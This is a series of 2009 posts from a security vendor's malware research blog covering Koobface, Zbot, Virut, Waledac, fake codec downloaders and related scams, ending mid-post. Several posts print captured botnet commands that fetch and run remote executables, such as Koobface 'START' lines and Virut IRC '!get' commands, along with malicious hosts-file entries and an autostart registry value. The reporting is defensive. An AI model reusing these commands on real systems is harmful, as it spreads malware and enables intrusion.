ThreatFire Research Blog

@stealyourmoney -- TweetFace Has a Tinyurl 4u

2009-07-10T07:51:00.000-07:00

Koobface joined the Twittersphere, and the Twittersphere is fighting back. It's good to see response from the social networking infrastructure.

Koobface has been distributed in prevalence for around a year now, with the ThreatFire community confident all along that their information is safe from the threat. In other words, if you want to keep it off of your system, careful of what you download and add a behavioral solution like ThreatFire to your system's security layers.

The Koobface family has been distributed in a couple of ways since June/July 2008, increasing its prevalence to significant volumes in December of last year. It started out as a standalone worm menacing the massive volumes of social networking users across a handful of social networks, defeating captcha, and downloading more malware to compromised systems. Now, it is more frequently distributed as part of a malware package by attacking sites, alongside other payloads delivered by exploit pages hosted by malicious web sites: Virut, click fraud components, spambots (Waledac) and scareware. Koobface can be a secondary method of propagation for these various malware distribution groups.

So it was only a matter of time before the developers figured out that Twitter is another popular Web 2.0 medium. They also figured out that Tinyurl is one way to obfuscate malicious urls and distribute these urls across tweets.

These urls lead to the standard phony codec pages that is a trademark of the group. This time you'll see "Video posted by -WizArD-", the site remains up:

When setup.exe is downloaded and run from 98.217.161.163, the user of course does not install an Adobe Flash Player Update as promised. Instead, they get an updated version of the Koobface worm. Along with the worm, the compromised system eventually is redirected to a FakeAv offer, so the group can make its money:

This morning, accounts tweeting the "My home video :) " message with a tinyurl leading to the "Video posted by -Wizard-" are receiving some cleanup attention:

The Tinyurl has been disabled as well.

itsecure.microsoft.com?

2009-07-09T14:15:00.000-07:00

Your browser could be redirected to antivir-systempro.com, and you could be fooled into buying something from a spoofed website, following a driveby attack on your system. Or, a piece of malware could edit your hosts file and open a window to a legitimate looking Url. Right now, here is a short and active list of hosts file modifications from some active malware:
209.44.111.62 itsecure.microsoft.com
209.44.111.62 avremover-pro.com
209.44.111.62 www.avremover-pro.com

We've posted before on ugly hosts file modifications, and about the malicious authors' intention of duping users into believing that they are downloading something from a legitimate site. The current scheme is in the same vein.

Know that the ip address 209.44.111.62, when added to the hosts file with the entry "itsecure.microsoft.com", is not related to the legitimate software company's web presence. Currently, this scheme leads to FakeAv "Antivirus System PRO":

Streamviewer.exe, Tubeviewer.exe, Tubeplayer.exe, now Onlinemovies.exe!

2009-07-09T11:55:00.000-07:00

The gang serving up malicious downloaders from a couple of servers just spiced things up, changing streamviewer and softwarefortubeview to "onlinemovies.40008.exe" to the list of obnoxious files served from 64.20.38.172. Av detection is very low. It seems that the isp's may be acting on public information -- the sites were up for only a short time today, but ThreatFire protected the community from this prevalent malware all morning.

Related names currently resolving to that address include
exe-dot.com
exe-site.com
my-exe-load.com
red-exe.com
soft-exe.net
tiaexe.com

The group seems to be branching out from the phony movie player theme, more often packaging up the downloader into serial generators and crack installers like serial.dragon.naturally.speaking.9.45042.exe and crack.sony.vegas.platinum.edition.9.0.45057.exe. Pirates and p2p users need to be careful of what they download and run.

South Korea and U.S. Government Sustained DDoS

2009-07-09T10:31:00.000-07:00

The botnet driven distributed denial of service attack that started over the weekend has been attacking American agency web sites like the White House web site, the FTC site, NYSE site, FAA, NSA, Dept of Homeland Security, the Treasury, and many more agency web sites is a pretty bold thing to do. The botnet also has many South Korean web sites in its crosshairs as well, including the president's and various news and commerce sites.

We are examining the binaries involved, and ThreatFire could have protected those systems from the bot, stopping its dropper, and in turn, prevented at least some of the DoS flood on these U.S. and the many South Korean web sites. The underlying code itself appears to be fairly unsophisticated.

One of the malicious DoS components is delivered unpacked, sets itself up as a service, and contains a handful of commonly used user agent strings to camoflage its GET and POST traffic. Interestingly, we find "Accept-Language: ko, UA-CPU: x86" in the http headers. We are further looking into an unusual dependency on pcap for network traffic requests: pcap_open, pcap_sendpacket, and other functions are abused by this malware, but it uses common winsock calls to perform its network activity too.
Here it uses an extremely common registry editing technique to disable the compromised host's Windows firewall:

In the meantime, government, network operators and web masters in both countries are working to tame this thing.

Michael Jackson Zbot Data Stealing Hooks

2009-07-08T15:49:00.000-07:00

The recent Michael Jackson Zbot variant implements a variety of IAT hooks to perform its data stealing and stealth on victims' compromised systems. Its user-mode hook techniques have been described as "implemented properly" for malicious user-mode hooks. The Zbot releases have changed in various ways over time, and a couple of new additions reveal ongoing development by the same writers.

The Zbot family of malware continues to use multistaged component injection to achieve its final goal of stealing sensitive and confidential information off of the machine. It attempts to kill off two fairly prevalent firewalls at startup, functionality that seems to be present across all Zbot releases. It also continues to hide its ondisk components by hooking NtQueryDirectory within ntdll, and uses much of the same list of hooked win32 calls since the original release as its basis to plant more hooks:
LdrLoadDll
LdrGetProcedureAddress
NtCreateThread

A couple of hooks have been a common part of their ongoing releases to steal data:
GetClipboardData has always been used to steal information from the clipboard -- copying and pasting your username/password won't get past this malware.
TranslateMessage – buffers keyboard input from windows messages, converts the input to unicode, and sends it to the controller process’s pipe to be sent off of the victim's machine.

A couple of newer hooks placed by the malware are new and related to what is known as screenscraping:
BeginPaint/EndPaint – appear to be hooks designed to determine when to perform the screenshot functionality found in the DefWindowProcW hook.
DefWindowProcW – mechanism to extract a device context from a window and generate a bitmap from it. In other words, this functionality is used to take screenshots on the victim's machine as they are using it.

All in all, Zbot is one of the nastier malware families in circulation with a fairly regular release cycle and is actively used by cybercrooks. ThreatFire has been effectively preventing this malicious family from stealing information for a couple of years now.

ActiveX MsVidCtl 0day

2009-07-08T10:07:00.000-07:00

The MsVidCtl 0day has been passed around and fully distributed since at least the 6th. We have been monitoring multiple groups abusing Internet Explorer's capability to render streaming video.

Some of the fairly recent and interesting activity has been the exploit writers' javascript evasion techniques, splitting what was one page of javascript into 10 files, one for each line of javascript, and rendering some pattern matching solutions useless. This sort of attack would be most effective against the most performance sensitive security layers, like network based ones, and some other fairly unsophisticated client side solutions.

The payloads vary, from adware to social network credential stealing. ThreatFire has been preventing the exploit within the community from the start. We anxiously await a hotfix, something past the killbit workaround. Georg Wicherski points out that the vulnerability is a trivial one, in which the attacker can abuse the SEH handler. But really the current heap spray attack code that we have seen is reliable and less effort to implement with the spray. What has worked in the past will continue to be put out in prevalence!

In the meantime, your information is safe and protected against observed and unknown exploits attacking this vulnerability with ThreatFire.

Google Native Client Security Contest

2009-07-08T09:51:00.001-07:00

The results and the PoC are in, congratulations to Mark Dowd and Ben Hawkes for uncovering 12 vulnerabilities in the open source Google Native Client: "Native Client is an open-source research technology for running x86 native code in web applications, with the goal of maintaining the browser neutrality, OS portability, and safety that people expect from web apps ".

The project raises the question "Do we need another ActiveX?", or rather, "do we need a safer ActiveX for running untrusted and arbitrary code from within a browser on all platforms?". While the contest showed that BoF can be present in the sandbox itself, several of which appear to remain open issues, Google claims that the architecture in itself has been strengthened and validated by the contest: "This contest helped us discover implementation errors in Native Client and some areas of our codebase we need to spend more time reviewing. More importantly, that no major architectural flaws were found provides evidence that Native Client can be made safe enough for widespread use. Toward that end, we're implementing additional security measures, such as an outer sandbox". The contest seems to be an great way to clean up code, but the claims seem somewhat questionable. Just see what Dave Aitel has to say about what architectural flaws really are.

Waledac Fourth of July Run

2009-07-04T16:35:00.000-07:00

Over the past couple of months, the Waledac spam/botnet effort seemed to be dwindling. A large software company attempted to take credit for cleaning up the "ecosystem" of Waledac with their cleanup tool release.

In the meantime, Waledac's presence on systems started to change and appear in lower volumes, flying under the radar of many groups. The ThreatFire community saw Waledac code injected into svchost processes and prevented by ThreatFire in low volumes, bundled with other attacks.

So, it is somewhat surprising that the botnet group just cannot pass up another holiday, blasting out attention-attracting mail and flashy websites. Symantec reported on the spam messages sent out to entice users to visit malicious Waledac web sites, download and install the bot. In addition to the spam, here is the grammatically incorrect Waledac text from a screenshot of the YouTube spoofed sites set up by the distributors to fool users into running the downloaded malware:

"Colorful Independence Day events took place throughout the country

This year July 4th firework's shows were surprisingly amazing. The largest firework happend this Saturday. Unprecedented sum of money was spent on this fabulous show even despite crisis. The American Pyrotechnics Association has named South Shore's Fourth of July fireworks show as the best pyrotechnic displays in the nation. If you want to see this fantastic show just click on the video below and press "Run"."

When a user clicks on the phony video frame, the malicious Waledac executables with names like "video.exe", "movie.exe", "run.exe", "setup.exe" and others are served up.
The victim must then run the executables, no client side exploits are being delivered on multiple observed Waledac sites. Currently, fast-flux domains to avoid for this Waledac run include (but are not limited to):
4thfirework. com
holifireworks. com
video4thjuly. com
holidayfirework. com
moviefireworks. com
fireworksnetwork. com
movies4thjuly. com
happyindependence. com
freeindependence. com
fireworkspoint. com
movie4thjuly. com
fireworksholiday. com
moviesfireworks. com

Instead of registering these domains through Xin Net Technologies, this time around they were registered through China Springboard, Inc. It is quite likely that this provider will be one to watch for the next few holidays.

The bot itself continues to maintain a list of peer nodes for its P2P over HTTP technology in clean XML formatted data and is packed with techniques consistent with those used prior to this release -- not much has changed here.

Happy Fourth of July to our American readers and safe browsing!

FakeAv Settlement

2009-07-02T23:40:00.000-07:00

The Ftc recently settled against a FakeAv purveyor. While this settlement won't remove all of the variants out there, it is welcome news nonetheless with ongoing progress and the caselist here. The fewer distributors of XP Antivirus the better: "The two settling defendants were part of a massive deceptive advertising scheme that tricked more than a million consumers into buying “rogue” computer security products, including WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus, according to the FTC’s complaint." ThreatFire users were protected from a number of these scareware software packages, including XP Antivirus, in high volumes within the community back in mid-2008 and earlier.

The FTC's complaint from December calls this stuff scareware, also called "rogueware". It's amazing how many users really fell for and continue to fall for this stuff, and then cannot get their money back. According to the complaint:
"Unaware of the Defendants' trickery, more than one million consumers have purchased the Defendants' software products to cure their computers of the non-existent problems "detected" by the Defendants' fake scans...
Although some consumers later realize they have been defrauded by Defendants and attempt to seek refunds, Defendants routinely delay, obstruct and refuse to honor such requests."

Green Dam Controversy

2009-07-02T16:27:00.000-07:00

The Green Dam project to filter or censor web access on PC's sold in China is blossoming into a controversy. From the Wolchok, Yao, Halderman analysis of the software that added to the buildup:
"According to press reports, China will soon require all PCs sold in the country to include Green Dam. This software monitors web sites visited and other activity on the computer and blocks adult content as well as politically sensitive material...We examined the Green Dam software and found that it contains serious security vulnerabilities due to programming errors...In the meantime, we recommend that users protect themselves by uninstalling Green Dam immediately."

In light of the issues, the installation mandate seems to have been delayed indefinitely. We'll add more info as it comes to light and wikileaks comes back up.

Michael Jackson X-Files Answer

2009-07-02T09:01:00.000-07:00

Yesterday, amid the heavy Michael Jackson news coverage and tabloid autopsy speculations, another round of email was spammed out with the following text:

Michael Jackson Was Killed...
But Who Killed Michael Jackson?
Visit X-Files to see the answer:
(hxxp://xfiles link here)

The link redirected to a site hosted at 87.97.116.131 in an x-file-esque directory "x-files/x-file-mjacksonkiller.exe", which is currently down. The site hosted a malformed pdf and Zbot banking password stealing variant. The ThreatFire community prevented the file in very low prevalence, so very few users are falling for this sort of shameless scam. But we remind you to always think twice before running an unknown executable or visit an untrusted site (the url for this one is most likely not a domain one would recognize: jillih. com), regardless of the news. And update third party plugins on your system like pdf readers.

Update (7/8/09): hooks added to the Zbot code described here.

Russia and U.S. Cybersecurity Efforts

2009-06-30T14:26:00.000-07:00

The New York Times reported on the developing challenges in confronting cybersecurity challenges with government bodies in an article about the differing approaches between Russia and the U.S.: "The United States and Russia are locked in a fundamental dispute over how to counter the growing threat of cyberwar attacks that could wreak havoc on computer systems and the Internet. " The countries' political leaders will meet later this week, which may result in higher levels of cooperation between law enforcement agencies on an international level, more discussion around treaties, or absolutely nothing at all. We'll be watching.

Podmena, podmena.dll and podmena.sys = spoof, spoof.dll, spoof.sys

2009-06-18T15:34:00.000-07:00

We have been investigating and analyzing a variety of malicious components delivered from some recent downloaders. Some of the filenames stand out as unusual. In particular, "podmena",
which translates from russian to english as "Substitution or replacement made in a covert way ("pod" - "sub" or "under", sort of under cover; "mena" - the root of word exchange); thus, it often stands for "spoof", "fake", etc. "Spoof". It is fitting.

The two "podmena" files dropped by the phony codec/viewer installs seem to be gathering much interest and gaining prevalence. They'll be discussed here and the post itself will be updated with new information as it is uncovered.

First off, the files are dropped as one of the may payloads during the phony codec downloader attacks described in previous posts here, here and here. The components seem to be a part of a click fraud scheme and a way to generate potentially artificial traffic volume to several search engines, including bee-find.com, missngpage.com, 102.123bounce.com, and www.search.pro.

Podmena.dll gets registered as a ServiceDll to be run via svchost.exe -k podmena.dll.
Podmena.sys is installed as a kernel driver to run at startup and attaches to \Device\Tcp, intercepting all tcp related IRPs.

The Dll upon startup sends a DeviceIoControl() request to the driver opened on \\.\podmena\. The initial IO control code tells the driver to monitor outbound tcp port 80, and redirect all packets to 127.0.0.1:8085. Then, the dll sends a second io control code to the driver, which activates the forwarding.

The Dll will create a bound listening port on 8085 which now acts as an HTTP proxy for all outbout port 80 traffic. Upon packet reception (after it is redirected by the driver), the Dll will scan the requested url for search keywords based on the domain name of the request. (ie: search.yahoo, google, youtube, yahooapis, metacafe, sugg.search, aolcdn, etc)

When a keyword is found, it will submit the text to its parent controller (the binaries that we have seen hard code "zz-dn.com", which is unavailable, and then falls back to 85.13.236.134, an ip hosted in London). Depending on some timing randomization, the Dll will then load up and send the web browser to urls based on the response it receives back from this parent controller.

In our lab, subsequent requests were sent to a variety of sites, with all of these sites hosting a variety of ads, even without visiting a search engine. The svchost process loaded up with podmena.dll can visit hundreds of sites approximately every ten minutes, depending on the instruction response it receives.

Oddly, we have not seen higher target moneymakers like banking userid's and passwords stolen by these components.

Wanna See Harry Potter and the Half-Blood Prince?

2009-06-18T11:13:00.000-07:00

You're going to have to wait for it to come out. And if you don't, you may be sorry you didn't wait.

The group pushing blackhat SEO tactics to abuse the most popular networks, including digg.com, blogspot.com and others, continues to prey on those interested in upcoming movie releases.

First, a user most likely will come across popularized phony links within the blogosphere. Here is an example of the group's digg.com abuse, where they entice Harry Potter fans with text: 'Watch "Harry Potter and the Half-Blood Prince" online free', and fill up the digg comment list with related keywords to attract more search engines:

This link redirects to a blogspot post that contains more images from the movie itself, intensifying the anticipation and convincing the user that the movie is only one click away 'Watch "Harry Potter and the Half-Blood Prince" movie 2009 online for free'. See an example of the blog post here:

Clicking on any one of these links on the blog post redirects the user to the standard phony video offer:

It is here that the user is prompted to download and install the additional "streamviewer" malicious downloader component from exe-center .com at 64.20.38.171, which we have been monitoring. This phony viewer is really a downloader component that has been installing all sorts of malware, changing its selection of malware on a daily basis: Koobface (the digg user most likely is into social networking), adware, scareware, click fraud components, spambots, spyware and more. Missing out on an early peek at Harry Potter is then the least of the user's worries.

This theme predictably will be used over p2p networks and other vectors of delivery in the coming weeks. Stay tuned.

Warning! The media system on your computer is corrupt.

2009-06-17T16:30:00.000-07:00

No, probably not. This fake alert most likely has to do with the streamviewer exe that you downloaded and ran.

We've been monitoring a FakeAv/Koobface/spyware delivery scheme, and today the group dropped their standard FakeAv moneymaker and added a set of phony codec gimmickry to their back of tricks, redirecting the user's browser to v-s-codecpro.com/purchase.php?code=, all while popping scareware messages about corrupt sound and video codecs. See the prompt in the lower right hand corner here:

The codecs on your system are most likely not corrupted, they were not corrupted on our infected lab system.

Streamviewer's .gif Images Embedded with Encrypted Malware

2009-06-16T09:15:00.000-07:00

Our post last week warned on a group moving their FakeAv-Koobface-Vundo-Spyware "softwarefortubeview" phony codec downloader to a new home last week, and this week, we are examining a similar scheme that downloads, surprise, surprise, Koobface, FakeAv prompting BHOs like iehelper.dll's prompts for "Antivirus system PRO", performs some level of click fraud, installs podmena.dll and podmena.sys...this one also includes a nice ftp credential stealing component, stealing passwords from FileZilla, Coffee Cup, FTP Control, CuteFtp and more.

Streamviewer.40050.exe (and other streamviewer + random version names) has been flying off the shelf at a server on 64.20.38.171. That ip hosts multiple badware domains:
go-exe-go.com
reverse38-170.reserver.ru
gruzzilla.com
hot-exe-area.com
last-exe-portal.com
main-exe-home.com
super-exe-home.com

Interesting about the downloader is the way in which additional malware is downloaded and dropped by this phony codec. It contacts a set of servers with encoded data about the system.
reportsystem32.com (216.240.146.119)
terradataweb.com (66.199.229.229)
dvdisorapid.com (64.27.5.202)
superimagesart.com (95.211.8.61)
thenewpic.com (66.148.80.4)

It then pulls out data from a decoded xml file containing a list of urls to contact for a variety of .gif images (titem.gif, qwerce.gif, 217.gif, etc).
superimagesart.com
thenewpic.com
stockshopimages.com
imagesoffline.com
theimagesphoto.com
imageheadphones.com

At the time of download, gif viewers will display titem.gif with a political message about french politician Christine Boutin:

Know that we do not endorse any political message with this post. But this gif image is no ordinary image. If it were, its size might reach 35 kb at the most. Embedded in the image is the encrypted payload, bloating the image out over a couple hundred kilobytes (~270 kb).
The downloader gathers the response information from the previous sites to find more urls to contact and finds its decryption key. It then uses its key to decrypt the code embedded within downloaded gifs.

Much like the recent (and possibly related) beladen downloader and the older Tibs downloaders, this malware delivery embedded image scheme attempts to evade gateway appliance based protection and optimized AV scans with gif-based encrypted payloads. It stymies automated web crawling based research efforts. No longer are we seeing simple xor decoding schemes with visible PE headers in downloaded image files. The encryption implemented for this attack was another previously commerical and proprietary encryption algorithm.
ThreatFire is preventing this downloader in fairly high prevalence.

Patch Tuesday

2009-06-10T09:18:00.000-07:00

It is Patch Tuesday and Microsoft posted another ten bulletins for their Windows platform and Office applications -- be sure to update, six of the ten are rated "critical" or "pwn me". Four of the patches address holes in client side targets like Internet Explorer, Word, Excel, and a Works converter. Visiting the site results in over 30 high priority patch installs for many systems.
Where do you want to go today -- head on over to the Microsoft update site.

Softwarefortubeview Moves to a New Home at 65.110.50.141

2009-06-03T10:12:00.001-07:00

We posted a couple of weeks ago on the continued success of a group in distributing FakeAv/Rogueware/Scareware.

Please note that their downloaders have been moved to a new home at 65.110.50.141. There are multiple domains currently resolving to that ip managed by "Sago Networks". One we know of currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.

The downloads appear to be committing some sort of click fraud, although they have been known to pop fake alerts to move FakeAv software, see here, here and here.

Update (2009.06.09) -- we are following the downloaders, and the group moved to another couple of ip's yesterday (2009.06.08), this time 66.197.171.9 and 66.197.171.6. For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, include "Download Now!" links that redirect to paid mp3 services, fetish videos, and more malware.
Also related is my-exe-profile. com/ av-scanner.48047.exe. However, this dropper/downloader lays out a couple of Clickfraud trojans, visiting a long list of banner ads and ad sites from the compromised host. A Vundo variant is installed. An unusually packed Koobface variant is dropped on the machine. Another iehelper.dll Bho component pops a screenful of AntiVirus System PRO, or SWP2009Pro, and a dialog "There are serious threats detected on your computer" and another bogus "Windows Security Alert" reporting "Windows reports that your computer is infected".

The final, and fairly new piece, is that it downloads pdrv.exe from evidek.ro. The "download and exec" command for this executable is sent down from a Koobface related channel, while more bogus alerts are popping on the system:

Partially mangled Koobface post and response are listed here:

POST /ld/gen.php
HTTP/1.0
Host: upr15may.com
f=0&a=1956647682&v=09&c=0&s=ld&l=71140&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1

#PID=8000
STARTONCE|hxxp://evidek. ro/1/pdrv.exe
WAIT|120
#BLACKLABEL
EXIT

This dropper creates
%ProgramFiles%\podmena\podmena.dll
%ProgramFiles%\podmena\podmena.sys
for which there is virtually no AV detection at this time. As always, don't forget your behavioral-based protection.

The podmena.sys driver is interesting -- it attaches to the tcpip device driver and appears to intercept network traffic coming and going from the system.

Undetected Autorun/Injector Variant on the Loose

2009-06-02T14:20:00.000-07:00

A new variant of an Autorun worm is on the loose, probably created by another childish and angry ex-lover. The little multithreaded beast injects into windows explorer, and attempts to communicate with one of several Irc servers at June.IRCdevils.net, June.helldark.biz, and June.a7aneek.net with a "VirUS/Virus” user/pass and a "VirUS-randstring" nick.

We noticed it this morning on multiple machines, and it seems to be spreading. The worm injects itself into the Windows explorer shell, and from there attempts to update multiple locations in the registry and removable drives like usb sticks with SETUP\DATA\June.exe.
It includes a nasty message in the accompanying autorun.inf file with a long annoying string.
;HEHhahahahehhehehahahahhehehehaha

It was packed with Armadillo, which potentially made it difficult to detect for the AV vendors -- none detected it this morning, and this afternoon seems to bring only one or two vendors declaring it "suspicious" since we uploaded it to VirusTotal for sharing. Be sure to add true client-side behavioral protection to your system, and as always, use caution when sharing usb sticks with others.

We are seeing it running on systems alongside FakeAv installers, including "System Security", where we see the fake scare tactics blaring "WARNING! 38 infections found!!!". The two may be related, we are investigating.

Which of course, continues to nag the user with "System Security Firewall has blocked a program from accessing the internet" and pops its nag system tray balloon with "System Security Warning Your PC is still infected with dangerous viruses"

Cyberspace Policy Review

2009-05-29T10:37:00.000-07:00

If you're looking for the 60-page cybersecurity policy review that President Barack Obama discussed this morning, you can find it here.

Considering that AlephOne's article on "Smashing the Stack for Fun and Profit" was released in 1996, Iloveyou in 2000, CodeRed in 2001, the Slammer worm in 2003, the Witty worm event in 2004, the thousands of system intrusions and compromises since (reported and unreported), and the list goes on, the review seems around fifteen years late on delivery. But better late than never. It addresses badly needed subjects and planning in thoughtful and creative ways.

Some of the document is predictably clumsy. Chapter IV, "Creating Effective Information Sharing and Incident Response", oddly starts out with a current example of Downadup/Conficker as impetus for action: "For example, despite advance warning and instructions on how networks could be protected, had the “Conficker [Downadup]”worm activated on April 1, 2009 with a malicious payload, some federal departments and agencies were not prepared to respond". What malicious payload? Unprepared in what way? To infected machines within the federal and state governements? To a DDoS attack from the the majority of Downadup-infected systems across the ocean that actually were infected (and most just wound up with a FakeAv download)? Don't leave me hanging, folks, what were they unprepared for?

Of note, some of the law enforcement agencies in attendance at the presentation have field offices with agents that don't know what a URL is (which is much like reporting something to a police officer and hearing them respond "Sorry, I don't know what a street address is, please tell someone else"). Based on that level of techno-savvy, the section on cyber-education is much needed, overdue, and significant: "Building Capacity for a Digital Nation".

It's a good read, especially the section addressing internationally co-ordinated efforts, "Partner Effectively With the International Community".

Cheers to open dialog about cyber-security challenges!

Virut Distributing Koobface, Ad-Clickers and Spambots

2009-05-26T15:46:00.000-07:00

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users' systems even when the traditional Av scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat's current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We'll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut's current strain of executable infector is in prevalence. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE...

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves "load.exe" malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the "dl.guarddog2009.com" is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper )
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
"If you don't feel like a complete person because you can't afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches."
A link is included that takes you to a "group" at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like "trylamp. com". Often, other pieces of spam carry offers for pills of all kinds.

Brunga.at Facebook Phish

2009-05-21T12:29:00.000-07:00

While no product protects against absolutely everything, a couple of technical support people here had links sent from their friends to their Facebook account, telling them to check out "Brunga. at". (Do not visit this site right now to fill out login information, it will steal your credentials.)

Subject: Dan Shmoo sent you a message on Facebook...
Dan sent you a message.

Subject: Hello
"Check brunga.at"

Screenshot of the site here, notice the blue banner missing the logo:

After filling out authentication details that are then stolen, the user is then redirected to the real Facebook site.
Use your head and always be aware of the site's url when entering authentication/login info. Careful of phishing attacks.

Sorry, folks, ThreatFire doesn't protect you from phishing attempts like this one -- it wasn't designed to stop phish, and nothing at the software behavioral level looks malicious here. The times that we visited the active site, there was no malware delivered from brunga. However, there was an iframe at the bottom of the page redirecting the browser to a site that has been known to deliver LuckySploit exploit pages (updateserver. com, another site to avoid for now). Any successful LuckySploit attack is bound to deliver a barrage of various malware, recently including banking password-stealer Zbot, sophisticated spambots like Rustock, and various other custom-made keyloggers. This specific server is busy, malicious, and it has been involved in Live.com poisoning too. On a daily basis, ThreatFire is preventing these malformed-pdf based LuckySploit attacks in high numbers.

Gumblar Grumbling

2009-05-20T11:22:00.001-07:00

A couple of anti-malware firms have grumbled about the number of successful web site compromises a group has been making in order to inject malicious web pages on these victimized sites and refer to the threat as "Gumblar", reportedly using stolen ftp credentials and possibly other configuration issues and vulnerabilities. These hijacked web sites in turn attack visiting users' web browsers with the goal of downloading and executing more malware hosted on a remote server. Originally the exploit/trojan/spyware hosting site was gumblar.cn, it was changed to martuz.cn, and the domain most likely will change again.

The large numbers in the news refer not to the trojan, or the malware that was hosted on gumblar and martuz. The large numbers are detections of web pages that, however accurate the volume reporting may be, most likely are a part of hijacked web sites redirecting browsers to the exploits and trojans on the gumblar.cn and trojans on the martuz.cn domains.

When a user doesn't patch their system for whatever reason, they may be maintaining known vulnerabilities in their software, which in turn is exploited when visiting a hijacked web presence. Following successful third party plugin exploitation, the delivered dropper is executed. The dropper uses an interesting technique to register loaded components for auto start on an unsuspecting user's system. Instead of the usual run key and service locations, this writer decided to abuse a user-mode auxiliary audio driver location that is loaded when Internet Explorer is started. This ThreatExpert report and here shows a "Infostealer.Daonol/Trojan-Dropper.Win32.Agent.apfn/Troj/Daonol-Fam" trojan abusing the "Drivers32" key, much like the original gumblar variant:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
aux = "%Temp%\..\doo.val"

The group is not using any 0day attacks. Instead, they are sending down malformed .pdf and .swf files. It seems that enough reminders cannot be sent out about updating third party software:
Antivirus 360 Distribution - Update Third Party Plugins
PDF Reader Exploitation 2009
Pdf Reader Exploitation 2009 (cont)
Rigged pdf files
browser-security.microsoft.com Hosts File Modification

We will post more data as it is gathered, the trojan itself is not in high prevalence in the ThreatFire community -- the attack has gotten far enough to launch the trojan on only a couple of systems and is prevented as "Spyware.Grumbler".

In the meantime, be sure to update your favorite third party plugins, applications and your system software.

SoftwareForTubeview Codec Scheme's Continued Success

2009-05-15T13:13:00.000-07:00

A rogueware distribution gang known for their use of Rbn services and phishing scams continue to maintain a couple of the busiest servers in our daily prevented malware lists. Starting on May 6th, the group moved their downloaders and malware (similarly named to softwarefortubeview.4000.exe) from being served at 195.88.80.41 to exclusively 91.212.65.54.

This group appears to be getting quite a bit of traction out of their ongoing FakeAv scheme, in addition to the phishing activities. They started out in late 2008 on 94.247.3.232 with tubeviewer.95.exe, and in mid-January, moved tubeviewersetup..exe to several other addresses:
216.195.40.88
94.247.3.232
91.211.64.131

and since May 6th, they have served softwarefortubeview.40019.exe (among other names) at 91.212.65.54, for which we see multiple domain names registered:
cls-softwares.com
kol-programmers.com
kxc-softwaresportal.com
rol-programms.com
sdfv-programs.com
sgh-topprograms.com
slk-softwareportal.com
slk-softwareportal.com
hex-programmers.com
kor-programms.com
res-supersoft.com

You can see our previous posts regarding their FakeAv malware downloaders, with some of the most popular scareware messages: "you have a security problem" and "security system has detected spyware infection!".

The redirection to this executable most often comes from blog posts offering free current movies, like "Watch Push Movie Online Free". You get what you pay for. Notice the video frame at the bottom of the post. Avoid this blog and others like it:

"Anika", the poster of the phony blog above, also set up a number of other blogs, hoping to capture more curious cats looking for "movie online free":

Eventually, clicking on the posts' link sets up the browser for a series of javascript redirections to "watch-for-free.net", where the phony executable is finally offered to watch the non-existent flick.
For example, a few clicks for a "movie online free" Mr. Bean video link redirects the browser through several links and eventually the fake video iframe coughs up the download prompt for the gang's malware:
hxxp://watch-mr-bean-movie-online-free.blogspot.com/ -->
